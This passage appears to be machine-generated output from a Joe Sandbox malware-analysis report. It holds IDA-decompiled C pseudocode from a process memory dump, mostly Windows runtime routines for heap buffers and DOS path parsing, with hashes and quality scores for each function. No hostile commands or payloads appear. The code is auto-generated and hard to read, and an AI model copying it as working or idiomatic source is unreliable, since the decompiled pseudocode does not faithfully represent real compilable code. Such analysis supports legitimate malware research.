                    														_t523 = 0x10;
                    														 *_t505 = _t523;
                    														_t367 = 3;
                    														 *((short*)(_t505 + 2)) = _t367;
                    														_t368 = 4;
                    														 *((short*)(_t505 + 6)) = _t368;
                    														 *(_t505 + 4) = 0;
                    														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
                    														_t327 = 1;
                    														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                    														_t479 = _t479 + _t523;
                    														 *(_t528 - 0x78) = _t479;
                    														__eflags = _t454;
                    														if(_t454 != 0) {
                    															_t186 = _t454 + 4;
                    															 *_t186 =  *(_t454 + 4) | 1;
                    															__eflags =  *_t186;
                    														}
                    														 *(_t528 - 0x80) = _t505;
                    													}
                    													__eflags =  *(_t528 - 0x7a) - _t327;
                    													if( *(_t528 - 0x7a) == _t327) {
                    														 *(_t528 - 0xd4) = _t479 + _t427;
                    														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
                    														E016AF3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
                    														_t529 = _t529 + 0xc;
                    														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                    														_t479 =  *(_t528 - 0x78) + _t522;
                    														 *(_t528 - 0x78) = _t479;
                    														__eflags = _t505;
                    														if(_t505 != 0) {
                    															_t199 = _t505 + 4;
                    															 *_t199 =  *(_t505 + 4) | 1;
                    															__eflags =  *_t199;
                    														}
                    														_t505 =  *(_t528 - 0xd4);
                    														 *(_t528 - 0x80) = _t505;
                    													}
                    													__eflags =  *(_t528 - 0xa8);
                    													if( *(_t528 - 0xa8) != 0) {
                    														_t356 = _t479 + _t427;
                    														 *(_t528 - 0xd4) = _t356;
                    														_t462 =  *(_t528 - 0xac);
                    														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
                    														_t485 = 0xc;
                    														 *((short*)(_t356 + 2)) = _t485;
                    														 *(_t356 + 6) = _t462;
                    														 *((short*)(_t356 + 4)) = 0;
                    														_t211 = _t356 + 8; // 0x9
                    														E016AF3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
                    														E016AFA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
                    														_t529 = _t529 + 0x18;
                    														_t427 =  *(_t528 - 0x88);
                    														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                    														_t505 =  *(_t528 - 0xd4);
                    														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
                    														 *(_t528 - 0x78) = _t479;
                    														_t362 =  *(_t528 - 0x80);
                    														__eflags = _t362;
                    														if(_t362 != 0) {
                    															_t222 = _t362 + 4;
                    															 *_t222 =  *(_t362 + 4) | 1;
                    															__eflags =  *_t222;
                    														}
                    													}
                    													__eflags =  *(_t528 - 0xb0);
                    													if( *(_t528 - 0xb0) != 0) {
                    														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
                    														_t458 = 0xb;
                    														 *((short*)(_t479 + _t427 + 2)) = _t458;
                    														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
                    														 *((short*)(_t427 + 4 + _t479)) = 0;
                    														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
                    														E016AFA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
                    														_t529 = _t529 + 0xc;
                    														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                    														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
                    														 *(_t528 - 0x78) = _t479;
                    														__eflags = _t505;
                    														if(_t505 != 0) {
                    															_t241 = _t505 + 4;
                    															 *_t241 =  *(_t505 + 4) | 1;
                    															__eflags =  *_t241;
                    														}
                    													}
                    													_t328 =  *(_t528 + 0x1c);
                    													__eflags = _t328;
                    													if(_t328 == 0) {
                    														L87:
                    														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
                    														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
                    														_t455 =  *(_t528 - 0xdc);
                    														 *(_t427 + 0x14) = _t455;
                    														_t480 =  *(_t528 - 0xa0);
                    														_t517 = 3;
                    														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
                    														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
                    															asm("rdtsc");
                    															 *(_t427 + 0x3c) = _t480;
                    														} else {
                    															 *(_t427 + 0x3c) = _t455;
                    														}
                    														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
                    														_t456 =  *[fs:0x18];
                    														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
                    														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
                    														_t427 = 0;
                    														__eflags = 0;
                    														_t511 = 0x18;
                    														goto L91;
                    													} else {
                    														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
                    														__eflags = _t519;
                    														 *(_t528 - 0x8c) = _t328;
                    														do {
                    															_t506 =  *((intOrPtr*)(_t519 - 4));
                    															_t457 =  *((intOrPtr*)(_t519 - 0xc));
                    															 *(_t528 - 0xd4) =  *(_t519 - 8);
                    															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
                    															__eflags =  *(_t333 + 0x36) & 0x00004000;
                    															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
                    																_t334 =  *_t519;
                    															} else {
                    																_t334 = 0;
                    															}
                    															_t336 = _t334 & 0x000000ff;
                    															__eflags = _t336;
                    															_t427 =  *(_t528 - 0x88);
                    															if(_t336 == 0) {
                    																_t481 = _t479 + _t506;
                    																__eflags = _t481;
                    																 *(_t528 - 0x78) = _t481;
                    																E016AF3E0(_t479 + _t427, _t457, _t506);
                    																_t529 = _t529 + 0xc;
                    															} else {
                    																_t340 = _t336 - 1;
                    																__eflags = _t340;
                    																if(_t340 == 0) {
                    																	E016AF3E0( *(_t528 - 0xb8), _t457, _t506);
                    																	_t529 = _t529 + 0xc;
                    																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
                    																} else {
                    																	__eflags = _t340 == 0;
                    																	if(_t340 == 0) {
                    																		__eflags = _t506 - 8;
                    																		if(_t506 == 8) {
                    																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
                    																			 *(_t528 - 0xdc) =  *(_t457 + 4);
                    																		}
                    																	}
                    																}
                    															}
                    															_t339 = 0x10;
                    															_t519 = _t519 + _t339;
                    															_t263 = _t528 - 0x8c;
                    															 *_t263 =  *(_t528 - 0x8c) - 1;
                    															__eflags =  *_t263;
                    															_t479 =  *(_t528 - 0x78);
                    														} while ( *_t263 != 0);
                    														goto L87;
                    													}
                    												}
                    											} else {
                    												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
                    												 *(_t528 - 0xa2) = _t392;
                    												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
                    												__eflags = _t469;
                    												while(1) {
                    													 *(_t528 - 0xe4) = _t511;
                    													__eflags = _t392;
                    													_t393 = _t427;
                    													if(_t392 != 0) {
                    														_t393 =  *((intOrPtr*)(_t469 + 4));
                    													}
                    													_t395 = (_t393 & 0x000000ff) - _t427;
                    													__eflags = _t395;
                    													if(_t395 == 0) {
                    														_t511 = _t511 +  *_t469;
                    														__eflags = _t511;
                    													} else {
                    														_t398 = _t395 - 1;
                    														__eflags = _t398;
                    														if(_t398 == 0) {
                    															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
                    															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
                    														} else {
                    															__eflags = _t398 == 1;
                    															if(_t398 == 1) {
                    																 *(_t528 - 0xa8) =  *(_t469 - 8);
                    																_t402 =  *_t469 & 0x0000ffff;
                    																 *(_t528 - 0xac) = _t402;
                    																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
                    															}
                    														}
                    													}
                    													__eflags = _t511 -  *(_t528 - 0xe4);
                    													if(_t511 <  *(_t528 - 0xe4)) {
                    														break;
                    													}
                    													_t397 =  *(_t528 - 0x88) + 1;
                    													 *(_t528 - 0x88) = _t397;
                    													_t469 = _t469 + 0x10;
                    													__eflags = _t397 -  *(_t528 + 0x1c);
                    													_t392 =  *(_t528 - 0xa2);
                    													if(_t397 <  *(_t528 + 0x1c)) {
                    														continue;
                    													}
                    													goto L45;
                    												}
                    												_t475 = 0x216;
                    												 *(_t528 - 0x74) = 0x216;
                    												goto L45;
                    											}
                    										} else {
                    											asm("lock dec dword [eax+ecx*8+0x4]");
                    											goto L16;
                    										}
                    									}
                    									_t491 = E01734CAB(_t306, _t528 - 0xa4);
                    									 *(_t528 - 0x74) = _t491;
                    									__eflags = _t491;
                    									if(_t491 != 0) {
                    										goto L91;
                    									} else {
                    										_t474 =  *((intOrPtr*)(_t528 - 0x94));
                    										goto L20;
                    									}
                    								}
                    								L16:
                    								 *(_t528 - 0x74) = 0x1069;
                    								L93:
                    								_t298 =  *(_t528 - 0xd0) + 1;
                    								 *(_t528 - 0xd0) = _t298;
                    								_t474 = _t474 + _t511;
                    								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
                    								_t494 = 4;
                    								__eflags = _t298 - _t494;
                    								if(_t298 >= _t494) {
                    									goto L100;
                    								}
                    								_t494 =  *(_t528 - 0xcc);
                    								_t435 = _t298;
                    								continue;
                    							}
                    							__eflags = _t494[2] | _t494[3];
                    							if((_t494[2] | _t494[3]) == 0) {
                    								goto L15;
                    							}
                    							goto L12;
                    						}
                    						__eflags = _t301;
                    						if(_t301 != 0) {
                    							goto L92;
                    						}
                    						goto L10;
                    						L92:
                    						goto L93;
                    					}
                    				} else {
                    					_push(0x57);
                    					L101:
                    					return E016BD130(_t427, _t494, _t511);
                    				}
                    			}

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 8b3528c8a4a72fb0e7493e6eab3149afe4eeee9635ef83a41b7243e75e3ee17e
                    • Instruction ID: f8832076016aeb228757a6ed48aa3d63774f5421a3bcf05c9836cd97cfa8e3e2
                    • Opcode Fuzzy Hash: 8b3528c8a4a72fb0e7493e6eab3149afe4eeee9635ef83a41b7243e75e3ee17e
                    • Instruction Fuzzy Hash: 69423C75910229DFDB24CF68C880BA9FBB1FF85304F1581EAE94DAB242D7749A85CF50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 92%
                    			E01684120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
                    				signed int _v8;
                    				void* _v20;
                    				signed int _v24;
                    				char _v532;
                    				char _v540;
                    				signed short _v544;
                    				signed int _v548;
                    				signed short* _v552;
                    				signed short _v556;
                    				signed short* _v560;
                    				signed short* _v564;
                    				signed short* _v568;
                    				void* _v570;
                    				signed short* _v572;
                    				signed short _v576;
                    				signed int _v580;
                    				char _v581;
                    				void* _v584;
                    				unsigned int _v588;
                    				signed short* _v592;
                    				void* _v597;
                    				void* _v600;
                    				void* _v604;
                    				void* _v609;
                    				void* _v616;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				unsigned int _t161;
                    				signed int _t162;
                    				unsigned int _t163;
                    				void* _t169;
                    				signed short _t173;
                    				signed short _t177;
                    				signed short _t181;
                    				unsigned int _t182;
                    				signed int _t185;
                    				signed int _t213;
                    				signed int _t225;
                    				short _t233;
                    				signed char _t234;
                    				signed int _t242;
                    				signed int _t243;
                    				signed int _t244;
                    				signed int _t245;
                    				signed int _t250;
                    				void* _t251;
                    				signed short* _t254;
                    				void* _t255;
                    				signed int _t256;
                    				void* _t257;
                    				signed short* _t260;
                    				signed short _t265;
                    				signed short* _t269;
                    				signed short _t271;
                    				signed short** _t272;
                    				signed short* _t275;
                    				signed short _t282;
                    				signed short _t283;
                    				signed short _t290;
                    				signed short _t299;
                    				signed short _t307;
                    				signed int _t308;
                    				signed short _t311;
                    				signed short* _t315;
                    				signed short _t316;
                    				void* _t317;
                    				void* _t319;
                    				signed short* _t321;
                    				void* _t322;
                    				void* _t323;
                    				unsigned int _t324;
                    				signed int _t325;
                    				void* _t326;
                    				signed int _t327;
                    				signed int _t329;
                    
                    				_t329 = (_t327 & 0xfffffff8) - 0x24c;
                    				_v8 =  *0x175d360 ^ _t329;
                    				_t157 = _a8;
                    				_t321 = _a4;
                    				_t315 = __edx;
                    				_v548 = __ecx;
                    				_t305 = _a20;
                    				_v560 = _a12;
                    				_t260 = _a16;
                    				_v564 = __edx;
                    				_v580 = _a8;
                    				_v572 = _t260;
                    				_v544 = _a20;
                    				if( *__edx <= 8) {
                    					L3:
                    					if(_t260 != 0) {
                    						 *_t260 = 0;
                    					}
                    					_t254 =  &_v532;
                    					_v588 = 0x208;
                    					if((_v548 & 0x00000001) != 0) {
                    						_v556 =  *_t315;
                    						_v552 = _t315[2];
                    						_t161 = E0169F232( &_v556);
                    						_t316 = _v556;
                    						_v540 = _t161;
                    						goto L17;
                    					} else {
                    						_t306 = 0x208;
                    						_t298 = _t315;
                    						_t316 = E01686E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
                    						if(_t316 == 0) {
                    							L68:
                    							_t322 = 0xc0000033;
                    							goto L39;
                    						} else {
                    							while(_v581 == 0) {
                    								_t233 = _v588;
                    								if(_t316 > _t233) {
                    									_t234 = _v548;
                    									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
                    										_t254 = L01684620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
                    										if(_t254 == 0) {
                    											_t169 = 0xc0000017;
                    										} else {
                    											_t298 = _v564;
                    											_v588 = _t316;
                    											_t306 = _t316;
                    											_t316 = E01686E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
                    											if(_t316 != 0) {
                    												continue;
                    											} else {
                    												goto L68;
                    											}
                    										}
                    									} else {
                    										goto L90;
                    									}
                    								} else {
                    									_v556 = _t316;
                    									 *((short*)(_t329 + 0x32)) = _t233;
                    									_v552 = _t254;
                    									if(_t316 < 2) {
                    										L11:
                    										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
                    											_t161 = 5;
                    										} else {
                    											if(_t316 < 6) {
                    												L87:
                    												_t161 = 3;
                    											} else {
                    												_t242 = _t254[2] & 0x0000ffff;
                    												if(_t242 != 0x5c) {
                    													if(_t242 == 0x2f) {
                    														goto L16;
                    													} else {
                    														goto L87;
                    													}
                    													goto L101;
                    												} else {
                    													L16:
                    													_t161 = 2;
                    												}
                    											}
                    										}
                    									} else {
                    										_t243 =  *_t254 & 0x0000ffff;
                    										if(_t243 == 0x5c || _t243 == 0x2f) {
                    											if(_t316 < 4) {
                    												L81:
                    												_t161 = 4;
                    												goto L17;
                    											} else {
                    												_t244 = _t254[1] & 0x0000ffff;
                    												if(_t244 != 0x5c) {
                    													if(_t244 == 0x2f) {
                    														goto L60;
                    													} else {
                    														goto L81;
                    													}
                    												} else {
                    													L60:
                    													if(_t316 < 6) {
                    														L83:
                    														_t161 = 1;
                    														goto L17;
                    													} else {
                    														_t245 = _t254[2] & 0x0000ffff;
                    														if(_t245 != 0x2e) {
                    															if(_t245 == 0x3f) {
                    																goto L62;
                    															} else {
                    																goto L83;
                    															}
                    														} else {
                    															L62:
                    															if(_t316 < 8) {
                    																L85:
                    																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
                    																goto L17;
                    															} else {
                    																_t250 = _t254[3] & 0x0000ffff;
                    																if(_t250 != 0x5c) {
                    																	if(_t250 == 0x2f) {
                    																		goto L64;
                    																	} else {
                    																		goto L85;
                    																	}
                    																} else {
                    																	L64:
                    																	_t161 = 6;
                    																	goto L17;
                    																}
                    															}
                    														}
                    													}
                    												}
                    											}
                    											goto L101;
                    										} else {
                    											goto L11;
                    										}
                    									}
                    									L17:
                    									if(_t161 != 2) {
                    										_t162 = _t161 - 1;
                    										if(_t162 > 5) {
                    											goto L18;
                    										} else {
                    											switch( *((intOrPtr*)(_t162 * 4 +  &M016845F8))) {
                    												case 0:
                    													_v568 = 0x1641078;
                    													__eax = 2;
                    													goto L20;
                    												case 1:
                    													goto L18;
                    												case 2:
                    													_t163 = 4;
                    													goto L19;
                    											}
                    										}
                    										goto L41;
                    									} else {
                    										L18:
                    										_t163 = 0;
                    										L19:
                    										_v568 = 0x16411c4;
                    									}
                    									L20:
                    									_v588 = _t163;
                    									_v564 = _t163 + _t163;
                    									_t306 =  *_v568 & 0x0000ffff;
                    									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
                    									_v576 = _t265;
                    									if(_t265 > 0xfffe) {
                    										L90:
                    										_t322 = 0xc0000106;
                    									} else {
                    										if(_t321 != 0) {
                    											if(_t265 > (_t321[1] & 0x0000ffff)) {
                    												if(_v580 != 0) {
                    													goto L23;
                    												} else {
                    													_t322 = 0xc0000106;
                    													goto L39;
                    												}
                    											} else {
                    												_t177 = _t306;
                    												goto L25;
                    											}
                    											goto L101;
                    										} else {
                    											if(_v580 == _t321) {
                    												_t322 = 0xc000000d;
                    											} else {
                    												L23:
                    												_t173 = L01684620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
                    												_t269 = _v592;
                    												_t269[2] = _t173;
                    												if(_t173 == 0) {
                    													_t322 = 0xc0000017;
                    												} else {
                    													_t316 = _v556;
                    													 *_t269 = 0;
                    													_t321 = _t269;
                    													_t269[1] = _v576;
                    													_t177 =  *_v568 & 0x0000ffff;
                    													L25:
                    													_v580 = _t177;
                    													if(_t177 == 0) {
                    														L29:
                    														_t307 =  *_t321 & 0x0000ffff;
                    													} else {
                    														_t290 =  *_t321 & 0x0000ffff;
                    														_v576 = _t290;
                    														_t310 = _t177 & 0x0000ffff;
                    														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
                    															_t307 =  *_t321 & 0xffff;
                    														} else {
                    															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
                    															E016AF720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
                    															_t329 = _t329 + 0xc;
                    															_t311 = _v580;
                    															_t225 =  *_t321 + _t311 & 0x0000ffff;
                    															 *_t321 = _t225;
                    															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
                    																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
                    															}
                    															goto L29;
                    														}
                    													}
                    													_t271 = _v556 - _v588 + _v588;
                    													_v580 = _t307;
                    													_v576 = _t271;
                    													if(_t271 != 0) {
                    														_t308 = _t271 & 0x0000ffff;
                    														_v588 = _t308;
                    														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
                    															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
                    															E016AF720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
                    															_t329 = _t329 + 0xc;
                    															_t213 =  *_t321 + _v576 & 0x0000ffff;
                    															 *_t321 = _t213;
                    															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
                    																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
                    															}
                    														}
                    													}
                    													_t272 = _v560;
                    													if(_t272 != 0) {
                    														 *_t272 = _t321;
                    													}
                    													_t306 = 0;
                    													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
                    													_t275 = _v572;
                    													if(_t275 != 0) {
                    														_t306 =  *_t275;
                    														if(_t306 != 0) {
                    															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
                    														}
                    													}
                    													_t181 = _v544;
                    													if(_t181 != 0) {
                    														 *_t181 = 0;
                    														 *((intOrPtr*)(_t181 + 4)) = 0;
                    														 *((intOrPtr*)(_t181 + 8)) = 0;
                    														 *((intOrPtr*)(_t181 + 0xc)) = 0;
                    														if(_v540 == 5) {
                    															_t182 = E016652A5(1);
                    															_v588 = _t182;
                    															if(_t182 == 0) {
                    																E0167EB70(1, 0x17579a0);
                    																goto L38;
                    															} else {
                    																_v560 = _t182 + 0xc;
                    																_t185 = E0167AA20( &_v556, _t182 + 0xc,  &_v556, 1);
                    																if(_t185 == 0) {
                    																	_t324 = _v588;
                    																	goto L97;
                    																} else {
                    																	_t306 = _v544;
                    																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
                    																	 *(_t306 + 4) = _t282;
                    																	_v576 = _t282;
                    																	_t325 = _t316 -  *_v560 & 0x0000ffff;
                    																	 *_t306 = _t325;
                    																	if( *_t282 == 0x5c) {
                    																		_t149 = _t325 - 2; // -2
                    																		_t283 = _t149;
                    																		 *_t306 = _t283;
                    																		 *(_t306 + 4) = _v576 + 2;
                    																		_t185 = _t283 & 0x0000ffff;
                    																	}
                    																	_t324 = _v588;
                    																	 *(_t306 + 2) = _t185;
                    																	if((_v548 & 0x00000002) == 0) {
                    																		L97:
                    																		asm("lock xadd [esi], eax");
                    																		if((_t185 | 0xffffffff) == 0) {
                    																			_push( *((intOrPtr*)(_t324 + 4)));
                    																			E016A95D0();
                    																			L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
                    																		}
                    																	} else {
                    																		 *(_t306 + 0xc) = _t324;
                    																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
                    																	}
                    																	goto L38;
                    																}
                    															}
                    															goto L41;
                    														}
                    													}
                    													L38:
                    													_t322 = 0;
                    												}
                    											}
                    										}
                    									}
                    									L39:
                    									if(_t254 !=  &_v532) {
                    										L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
                    									}
                    									_t169 = _t322;
                    								}
                    								goto L41;
                    							}
                    							goto L68;
                    						}
                    					}
                    					L41:
                    					_pop(_t317);
                    					_pop(_t323);
                    					_pop(_t255);
                    					return E016AB640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
                    				} else {
                    					_t299 = __edx[2];
                    					if( *_t299 == 0x5c) {
                    						_t256 =  *(_t299 + 2) & 0x0000ffff;
                    						if(_t256 != 0x5c) {
                    							if(_t256 != 0x3f) {
                    								goto L2;
                    							} else {
                    								goto L50;
                    							}
                    						} else {
                    							L50:
                    							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
                    								goto L2;
                    							} else {
                    								_t251 = E016A3D43(_t315, _t321, _t157, _v560, _v572, _t305);
                    								_pop(_t319);
                    								_pop(_t326);
                    								_pop(_t257);
                    								return E016AB640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
                    							}
                    						}
                    					} else {
                    						L2:
                    						_t260 = _v572;
                    						goto L3;
                    					}
                    				}
                    				L101:
                    			}

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 374dff7f4a5ba3e7b37b7d0e348a95daa5228bfd5532cbb221b92d380c941ba9
                    • Instruction ID: 76c60947c1ce9de87f5c10fa810775b9b1acbf65785912218af18df1e6ef298d
                    • Opcode Fuzzy Hash: 374dff7f4a5ba3e7b37b7d0e348a95daa5228bfd5532cbb221b92d380c941ba9
                    • Instruction Fuzzy Hash: ABF16D706082128BD724DF59C890B7ABBF2EF98714F148A2EF586C7750EB35D891CB52
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 92%
                    			E016920A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
                    				signed int _v16;
                    				signed int _v20;
                    				signed char _v24;
                    				intOrPtr _v28;
                    				signed int _v32;
                    				void* _v36;
                    				char _v48;
                    				signed int _v52;
                    				signed int _v56;
                    				unsigned int _v60;
                    				char _v64;
                    				unsigned int _v68;
                    				signed int _v72;
                    				char _v73;
                    				signed int _v74;
                    				char _v75;
                    				signed int _v76;
                    				void* _v81;
                    				void* _v82;
                    				void* _v89;
                    				void* _v92;
                    				void* _v97;
                    				void* __edi;
                    				void* __esi;
                    				void* __ebp;
                    				signed char _t128;
                    				void* _t129;
                    				signed int _t130;
                    				void* _t132;
                    				signed char _t133;
                    				intOrPtr _t135;
                    				signed int _t137;
                    				signed int _t140;
                    				signed int* _t144;
                    				signed int* _t145;
                    				intOrPtr _t146;
                    				signed int _t147;
                    				signed char* _t148;
                    				signed int _t149;
                    				signed int _t153;
                    				signed int _t169;
                    				signed int _t174;
                    				signed int _t180;
                    				void* _t197;
                    				void* _t198;
                    				signed int _t201;
                    				intOrPtr* _t202;
                    				intOrPtr* _t205;
                    				signed int _t210;
                    				signed int _t215;
                    				signed int _t218;
                    				signed char _t221;
                    				signed int _t226;
                    				char _t227;
                    				signed int _t228;
                    				void* _t229;
                    				unsigned int _t231;
                    				void* _t235;
                    				signed int _t240;
                    				signed int _t241;
                    				void* _t242;
                    				signed int _t246;
                    				signed int _t248;
                    				signed int _t252;
                    				signed int _t253;
                    				void* _t254;
                    				intOrPtr* _t256;
                    				intOrPtr _t257;
                    				unsigned int _t262;
                    				signed int _t265;
                    				void* _t267;
                    				signed int _t275;
                    
                    				_t198 = __ebx;
                    				_t267 = (_t265 & 0xfffffff0) - 0x48;
                    				_v68 = __ecx;
                    				_v73 = 0;
                    				_t201 = __edx & 0x00002000;
                    				_t128 = __edx & 0xffffdfff;
                    				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
                    				_v72 = _t128;
                    				if((_t128 & 0x00000008) != 0) {
                    					__eflags = _t128 - 8;
                    					if(_t128 != 8) {
                    						L69:
                    						_t129 = 0xc000000d;
                    						goto L23;
                    					} else {
                    						_t130 = 0;
                    						_v72 = 0;
                    						_v75 = 1;
                    						L2:
                    						_v74 = 1;
                    						_t226 =  *0x1758714; // 0x0
                    						if(_t226 != 0) {
                    							__eflags = _t201;
                    							if(_t201 != 0) {
                    								L62:
                    								_v74 = 1;
                    								L63:
                    								_t130 = _t226 & 0xffffdfff;
                    								_v72 = _t130;
                    								goto L3;
                    							}
                    							_v74 = _t201;
                    							__eflags = _t226 & 0x00002000;
                    							if((_t226 & 0x00002000) == 0) {
                    								goto L63;
                    							}
                    							goto L62;
                    						}
                    						L3:
                    						_t227 = _v75;
                    						L4:
                    						_t240 = 0;
                    						_v56 = 0;
                    						_t252 = _t130 & 0x00000100;
                    						if(_t252 != 0 || _t227 != 0) {
                    							_t240 = _v68;
                    							_t132 = E01692EB0(_t240);
                    							__eflags = _t132 - 2;
                    							if(_t132 != 2) {
                    								__eflags = _t132 - 1;
                    								if(_t132 == 1) {
                    									goto L25;
                    								}
                    								__eflags = _t132 - 6;
                    								if(_t132 == 6) {
                    									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
                    									if( *((short*)(_t240 + 4)) != 0x3f) {
                    										goto L40;
                    									}
                    									_t197 = E01692EB0(_t240 + 8);
                    									__eflags = _t197 - 2;
                    									if(_t197 == 2) {
                    										goto L25;
                    									}
                    								}
                    								L40:
                    								_t133 = 1;
                    								L26:
                    								_t228 = _v75;
                    								_v56 = _t240;
                    								__eflags = _t133;
                    								if(_t133 != 0) {
                    									__eflags = _t228;
                    									if(_t228 == 0) {
                    										L43:
                    										__eflags = _v72;
                    										if(_v72 == 0) {
                    											goto L8;
                    										}
                    										goto L69;
                    									}
                    									_t133 = E016658EC(_t240);
                    									_t221 =  *0x1755cac; // 0x16
                    									__eflags = _t221 & 0x00000040;
                    									if((_t221 & 0x00000040) != 0) {
                    										_t228 = 0;
                    										__eflags = _t252;
                    										if(_t252 != 0) {
                    											goto L43;
                    										}
                    										_t133 = _v72;
                    										goto L7;
                    									}
                    									goto L43;
                    								} else {
                    									_t133 = _v72;
                    									goto L6;
                    								}
                    							}
                    							L25:
                    							_t133 = _v73;
                    							goto L26;
                    						} else {
                    							L6:
                    							_t221 =  *0x1755cac; // 0x16
                    							L7:
                    							if(_t133 != 0) {
                    								__eflags = _t133 & 0x00001000;
                    								if((_t133 & 0x00001000) != 0) {
                    									_t133 = _t133 | 0x00000a00;
                    									__eflags = _t221 & 0x00000004;
                    									if((_t221 & 0x00000004) != 0) {
                    										_t133 = _t133 | 0x00000400;
                    									}
                    								}
                    								__eflags = _t228;
                    								if(_t228 != 0) {
                    									_t133 = _t133 | 0x00000100;
                    								}
                    								_t229 = E016A4A2C(0x1756e40, 0x16a4b30, _t133, _t240);
                    								__eflags = _t229;
                    								if(_t229 == 0) {
                    									_t202 = _a20;
                    									goto L100;
                    								} else {
                    									_t135 =  *((intOrPtr*)(_t229 + 0x38));
                    									L15:
                    									_t202 = _a20;
                    									 *_t202 = _t135;
                    									if(_t229 == 0) {
                    										L100:
                    										 *_a4 = 0;
                    										_t137 = _a8;
                    										__eflags = _t137;
                    										if(_t137 != 0) {
